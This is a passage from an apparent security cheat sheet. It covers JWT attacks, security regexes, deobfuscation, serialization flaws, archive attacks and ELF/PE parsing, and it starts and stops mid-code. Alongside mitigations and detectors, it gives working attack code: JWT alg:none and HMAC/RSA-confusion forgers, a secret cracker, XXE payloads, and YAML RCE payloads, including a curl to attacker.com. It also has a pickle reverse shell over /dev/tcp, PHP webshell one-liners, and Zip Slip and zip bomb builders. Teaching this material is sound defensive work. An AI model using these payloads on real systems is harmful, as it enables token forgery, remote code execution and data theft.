    return f"{encode_part(header)}.{encode_part(payload)}."

# Forge admin token
forged = jwt_forge_none({
    "sub": "1",
    "name": "admin",
    "role": "admin",
    "iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.

# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"

Forge JWT with HMAC/RSA confusion (CVE-2016-10555)

import hmac
import hashlib
import base64
import json

def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
    """
    If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
    The server will verify using the public key as HMAC key — signature matches.
    """
    header = {"alg": "HS256", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    header_b64 = encode_part(header)
    payload_b64 = encode_part(payload)
    signing_input = f"{header_b64}.{payload_b64}".encode()

    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()

    return f"{header_b64}.{payload_b64}.{sig_b64}"

# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
#     forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())

Crack JWT secret (HS256)

# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt

# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt

import hmac
import hashlib
import base64

def jwt_crack(token: str, wordlist_path: str) -> str | None:
    """Brute-force HS256 JWT secret from a wordlist."""
    parts = token.split('.')
    signing_input = f"{parts[0]}.{parts[1]}".encode()
    target_sig = base64.urlsafe_b64decode(parts[2] + '==')

    with open(wordlist_path, 'r', errors='ignore') as f:
        for line in f:
            secret = line.strip()
            computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(computed, target_sig):
                return secret
    return None

JWT security checklist

Attack	Condition	Mitigation
alg:none	Server accepts unsigned tokens	Reject `none` algorithm; whitelist allowed algorithms
HMAC/RSA confusion	Server accepts HS256 when configured for RS256	Enforce algorithm in server config, not from token header
Weak secret	Short/guessable HMAC key	Use 256+ bit random secret
No expiry	Missing `exp` claim	Always set and validate `exp`
kid injection	`kid` header used in SQL/file lookup	Sanitize `kid`, use allowlist
jwk/jku injection	Server fetches attacker-controlled key	Whitelist key sources
Claim tampering	Only signature checked, not claims	Validate all security-relevant claims server-side

10. Regular Expressions for Security

IPv4 / IPv6

import re

# IPv4 — strict
IPV4 = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)

# IPv4 with CIDR
IPV4_CIDR = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/\d{1,2})?\b'
)

# IPv6 — simplified (matches most common forms)
IPV6 = re.compile(r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'
                   r'|(?:[0-9a-fA-F]{1,4}:)*:(?::[0-9a-fA-F]{1,4})*')

# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
    r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
    r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
    r'192\.168\.\d{1,3}\.\d{1,3})\b'
)

URLs

URL = re.compile(
    r'https?://(?:[\w-]+\.)+[\w]{2,}'      # scheme + domain
    r'(?::\d{1,5})?'                         # optional port
    r'(?:/[^\s\'"<>]*)?'                     # optional path
)

# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')

Email

EMAIL = re.compile(
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
)

Hashes (for IOC extraction)

MD5_RE    = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE   = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')

CVE IDs

CVE = re.compile(r'CVE-\d{4}-\d{4,}')

Credit card numbers (PCI DSS scanning)

# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# Mastercard
MC = re.compile(r'\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')

# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')

def luhn_check(number: str) -> bool:
    """Validate credit card number with Luhn algorithm."""
    digits = [int(d) for d in number if d.isdigit()]
    digits.reverse()
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
    r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)

API keys and secrets

# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')

# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')

# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')

# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')

# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')

# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')

# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
    freq = {}
    for c in s:
        freq[c] = freq.get(c, 0) + 1
    return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())

# Strings > 20 chars with entropy > 4.5 are suspicious
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)

# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')

# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')

Combined IOC extractor

def extract_iocs(text: str) -> dict[str, list[str]]:
    """Extract all security-relevant indicators from text."""
    return {
        'ipv4': list(set(IPV4.findall(text))),
        'email': list(set(EMAIL.findall(text))),
        'url': list(set(URL.findall(text))),
        'md5': list(set(MD5_RE.findall(text))),
        'sha1': list(set(SHA1_RE.findall(text))),
        'sha256': list(set(SHA256_RE.findall(text))),
        'cve': list(set(CVE.findall(text))),
        'aws_key': list(set(AWS_KEY.findall(text))),
        'github_pat': list(set(GITHUB_PAT.findall(text))),
        'jwt': list(set(JWT_RE.findall(text))),
        'private_key': list(set(PRIVATE_KEY.findall(text))),
    }

11. Obfuscation & Deobfuscation

JavaScript obfuscation patterns

# --- JSFuck (encode JS using only []()!+ ) ---
# '(' becomes: (![]+[])[+!+[]+!+[]+!+[]]
# Full charset available from 6 characters

# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29")  ->  eval("alert(1)")

# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1)  ->  alert(1)

# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41))  ->  eval("alert(1)")

# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
    """Deobfuscate String.fromCharCode() calls."""
    import re
    pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
    def replace(m):
        chars = [int(c.strip()) for c in m.group(1).split(',')]
        return repr(''.join(chr(c) for c in chars))
    return re.sub(pattern, replace, js)

# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
    import re
    # \xNN
    result = re.sub(r'\\x([0-9a-fA-F]{2})',
                    lambda m: chr(int(m.group(1), 16)), js)
    # \uNNNN
    result = re.sub(r'\\u([0-9a-fA-F]{4})',
                    lambda m: chr(int(m.group(1), 16)), result)
    return result

# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
    import re, base64
    pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
    def replace(m):
        return repr(base64.b64decode(m.group(1)).decode())
    return re.sub(pattern, replace, js)

PowerShell obfuscation patterns

# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
    return base64.b64decode(encoded).decode('utf-16-le')

# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'

# --- Backtick escaping ---
# I`nv`oke-`Exp`ression -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
    import re
    # Remove backticks that escape normal characters (not special ones)
    return re.sub(r'`([^0abfnrtv])', r'\1', ps)

# --- -replace with char codes ---
# [char]73 + [char]69 + [char]88 -> 'IEX'
def deobfuscate_char_cast(ps: str) -> str:
    import re
    def replace(m):
        return chr(int(m.group(1)))
    return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)

# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'IEX'  (extracting chars from 'C:\WINDOWS\system32\cmd.exe')

# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
#   [IO.MemoryStream][Convert]::FromBase64String('...'),
#   [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

def decode_ps_deflate(b64_data: str) -> str:
    import base64, zlib
    compressed = base64.b64decode(b64_data)
    # PowerShell uses raw deflate (no zlib header), wbits=-15
    return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')

# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
    script = deobfuscate_backticks(script)
    script = deobfuscate_char_cast(script)
    # Remove common no-op patterns
    script = script.replace("( ", "(").replace(" )", ")")
    return script

Python obfuscation patterns

# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))

# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()

# --- Marshal/bytecode ---
import marshal, types
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))

# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
    """Replace exec/eval with print to see what would execute."""
    import re
    code = re.sub(r'\bexec\s*\(', 'print(', code)
    code = re.sub(r'\beval\s*\(', 'print(', code)
    return code
# WARNING: Only run deobfuscated code in a sandbox/VM

PHP obfuscation patterns

// Common patterns in webshells:

// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '')   // /e modifier = eval (PHP < 7)
// assert(base64_decode('...'))                       // acts like eval
// create_function('', base64_decode('...'))          // anonymous eval

// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']);                         // webshell one-liner

// chr() obfuscation:
// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');

# Deobfuscate PHP eval(base64_decode(...))
import re
import base64

def deobfuscate_php_b64(php_code: str) -> str:
    pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
    def replace(m):
        decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
        return f'/* DECODED: */ {decoded}'
    return re.sub(pattern, replace, php_code)

# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
    pattern = r'chr\((\d+)\)'
    parts = re.split(r'(chr\(\d+\))', php_code)
    result = []
    for part in parts:
        m = re.match(r'chr\((\d+)\)', part)
        if m:
            result.append(chr(int(m.group(1))))
        else:
            result.append(part.replace('.', ''))
    return ''.join(result)

12. Serialization Security

JSON

import json

# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)

# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution

# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */}  -> invalid JSON but some libs accept it

# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not

# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}')  # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
# Exploitation: WAF parses first key, backend parses last key

XML (XXE, XSS, billion laughs)

# --- DANGEROUS: Default XML parsing allows XXE ---
# NEVER use xml.etree.ElementTree with untrusted input without disabling entities

# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""

xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>&send;</root>"""

# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
# 3 bytes "lol" expands to ~3 GB

# SAFE XML parsing in Python
import defusedxml.ElementTree as ET  # pip install defusedxml
# or with stdlib:
from xml.etree.ElementTree import XMLParser
# Disable entities manually — defusedxml is strongly preferred

YAML (arbitrary code execution)

import yaml

# DANGEROUS: yaml.load() with default Loader executes arbitrary Python
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader)  # EXECUTES 'id'

# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")

# Exploit payloads:
yaml_rce_payloads = [
    "!!python/object/apply:os.system ['whoami']",
    "!!python/object/apply:subprocess.check_output [['id']]",
    "!!python/object/new:os.system ['curl http://attacker.com']",
    "!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]

# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# ---   i: y
# --- !!ruby/object:Gem::Requirement
# ---   requirements:
# ---     !!ruby/object:Gem::Package::TarReader
# ---     io: &1 !!ruby/object:Net::BufferedIO
# ---       io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# ---          read: 0
# ---          header: "abc"
# ---       debug_output: &1 !!ruby/object:Net::WriteAdapter
# ---          socket: &1 !!ruby/object:Gem::RequestSet
# ---              sets: !!ruby/object:Net::WriteAdapter
# ---                  socket: !ruby/module 'Kernel'
# ---                  method_id: :system
# ---              git_set: id
# ---          method_id: :resolve

Python pickle (arbitrary code execution)

import pickle
import os

# NEVER unpickle untrusted data — equivalent to eval()

# RCE via pickle:
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'

# More sophisticated: reverse shell via pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (
            ['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
        ))

# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK

def is_pickle_dangerous(data: bytes) -> bool:
    """Heuristic check for dangerous pickle opcodes."""
    dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
                         b'posix', b'commands', b'sys', b'importlib']
    for mod in dangerous_modules:
        if mod in data:
            return True
    return False

# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, use hmac to sign before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
    data = pickle.dumps(obj)
    sig = hmac.new(key, data, hashlib.sha256).digest()
    return data, sig

def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("Pickle signature verification failed")
    return pickle.loads(data)

PHP serialize/unserialize

# PHP serialization format:
# s:5:"hello";                -> string(5) "hello"
# i:42;                       -> int 42
# b:1;                        -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;}  -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";}  -> User object

# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods

# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
    return f's:{len(s)}:"{s}";'

def php_serialize_object(class_name: str, properties: dict) -> str:
    props = ''
    for key, value in properties.items():
        props += php_serialize_string(key)
        if isinstance(value, str):
            props += php_serialize_string(value)
        elif isinstance(value, int):
            props += f'i:{value};'
    return f'O:{len(class_name)}:"{class_name}":{len(properties)}:{{{props}}}'

# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}

# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison

13. Compression Security

gzip analysis

import gzip
import struct

# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)

# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
    if data[:2] != b'\x1f\x8b':
        raise ValueError("Not a gzip file")
    method = data[2]        # 8 = deflate
    flags = data[3]
    mtime = struct.unpack('<I', data[4:8])[0]
    return {
        'magic': data[:2].hex(),
        'method': 'deflate' if method == 8 else f'unknown({method})',
        'flags': f'{flags:08b}',
        'ftext': bool(flags & 1),
        'fhcrc': bool(flags & 2),
        'fextra': bool(flags & 4),
        'fname': bool(flags & 8),
        'fcomment': bool(flags & 16),
        'mtime': mtime,
    }

# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz           # list compression ratio
gzip -d -c suspicious.gz        # decompress to stdout
zcat suspicious.gz              # same as above

# Detect gzip by magic bytes
xxd suspicious.bin | head -1    # look for 1f8b

ZIP analysis and attacks

import zipfile
import os

# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
    for info in zf.infolist():
        print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
              f"{'encrypted' if info.flag_bits & 0x1 else ''}")

# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory

def safe_extract(zip_path: str, dest: str) -> None:
    """Extract ZIP safely, preventing path traversal."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for member in zf.infolist():
            member_path = os.path.realpath(os.path.join(dest, member.filename))
            if not member_path.startswith(dest + os.sep) and member_path != dest:
                raise ValueError(f"Path traversal detected: {member.filename}")
            zf.extract(member, dest)

# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
    dangerous = []
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for name in zf.namelist():
            if name.startswith('/') or '..' in name:
                dangerous.append(name)
    return dangerous

# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
    """Create a ZIP with path traversal payload. Authorized testing only."""
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr(target_path, content)

# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')

ZIP bomb (decompression bomb)

# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# Single-layer bomb:

def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
                     size_threshold: int = 1_000_000_000) -> bool:
    """Detect potential ZIP bomb by compression ratio."""
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for info in zf.infolist():
            if info.compress_size > 0:
                ratio = info.file_size / info.compress_size
                if ratio > ratio_threshold or info.file_size > size_threshold:
                    return True
            elif info.file_size > 0:
                return True  # zero compressed size but non-zero file size
    return False

# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
    """Create a single-layer zip bomb. Testing only."""
    with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Highly compressible data
        zf.writestr('bomb.txt', b'\x00' * uncompressed_size)

tar analysis and attacks

# List tar contents (check for path traversal)
tar -tvf archive.tar | grep -E '^\.\./|^/'

# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/

# Check for symlink attacks
tar -tvf archive.tar | grep '^l'

import tarfile

# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
    issues = []
    with tarfile.open(tar_path) as tf:
        for member in tf.getmembers():
            # Path traversal
            if member.name.startswith('/') or '..' in member.name:
                issues.append(f"PATH_TRAVERSAL: {member.name}")
            # Symlink outside extraction directory
            if member.issym() or member.islnk():
                issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
            # Setuid/setgid bits
            if member.mode & 0o4000 or member.mode & 0o2000:
                issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
            # Device files
            if member.isdev():
                issues.append(f"DEVICE_FILE: {member.name}")
    return issues

# Safe extraction (Python 3.12+ has filter parameter)
# tarfile.open(path).extractall(dest, filter='data')  # Python 3.12+

14. Binary & Struct Manipulation

struct packing and unpacking

import struct

# Format characters:
# < little-endian    > big-endian    ! network (big-endian)    = native
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f   float (4)       d   double (8)
# s   char[] (bytes)  p   pascal string
# x   padding byte

# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex())   # efbeadde34127856 (little-endian)

# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values])  # ['0xdeadbeef', '0x1234', '0x5678']

# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1")   # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0]     # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int))  # '192.168.1.1'

# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)

# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")

Endianness

# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)

value = 0xdeadbeef

# Manual conversion
le_bytes = value.to_bytes(4, 'little')   # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big')      # b'\xde\xad\xbe\xef'

# Swap endianness
def swap_endian_32(val: int) -> int:
    return struct.unpack('<I', struct.pack('>I', val))[0]

def swap_endian_16(val: int) -> int:
    return struct.unpack('<H', struct.pack('>H', val))[0]

# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
    """Check if value at offset matches expected in LE or BE."""
    le_val = struct.unpack_from('<I', data, offset)[0]
    be_val = struct.unpack_from('>I', data, offset)[0]
    if le_val == expected:
        return 'little-endian'
    elif be_val == expected:
        return 'big-endian'
    return 'unknown'

# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little')   # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big')       # 0xdeadbeef

ELF header parsing

import struct
from collections import namedtuple

def parse_elf_header(data: bytes) -> dict:
    """Parse ELF file header."""
    if data[:4] != b'\x7fELF':
        raise ValueError("Not an ELF file")

    ei_class = data[4]      # 1=32-bit, 2=64-bit
    ei_data = data[5]       # 1=LE, 2=BE
    ei_version = data[6]    # 1=current
    ei_osabi = data[7]      # 0=SYSV, 3=Linux, etc.

    endian = '<' if ei_data == 1 else '>'
    bits = 32 if ei_class == 1 else 64

    if bits == 64:
        # e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
        # e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
        # e_shnum(2) e_shstrndx(2)
        fmt = f'{endian}HHIQQQIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
    else:
        fmt = f'{endian}HHIIIIIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields

    ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
    MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
                0x08: 'MIPS', 0xF3: 'RISC-V'}

    return {
        'class': f'{bits}-bit',
        'endian': 'little' if ei_data == 1 else 'big',
        'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
        'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
        'entry_point': f'0x{e_entry:x}',
        'ph_offset': e_phoff,
        'ph_count': e_phnum,
        'sh_offset': e_shoff,
        'sh_count': e_shnum,
    }

# Usage:
# with open('/bin/ls', 'rb') as f:
#     info = parse_elf_header(f.read(64))
#     for k, v in info.items():
#         print(f"{k}: {v}")

# Quick ELF analysis
readelf -h /bin/ls            # full header
readelf -l /bin/ls            # program headers (segments)
readelf -S /bin/ls            # section headers
readelf -d /bin/ls            # dynamic section (libraries)
readelf -s /bin/ls            # symbol table
objdump -d /bin/ls | head -50 # disassembly

# Check for security features
checksec --file=/bin/ls       # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH

PE header parsing

import struct

def parse_pe_header(data: bytes) -> dict:
    """Parse PE (Windows executable) header."""
    if data[:2] != b'MZ':
        raise ValueError("Not a PE file")

    # e_lfanew: offset to PE signature (at offset 0x3C)
    pe_offset = struct.unpack_from('<I', data, 0x3C)[0]

    if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
        raise ValueError("Invalid PE signature")

    # COFF header (20 bytes after PE signature)
    coff_offset = pe_offset + 4
    machine, num_sections, timestamp, sym_table, num_symbols, \
    opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)

    MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}

    # Optional header magic
    opt_offset = coff_offset + 20
    opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
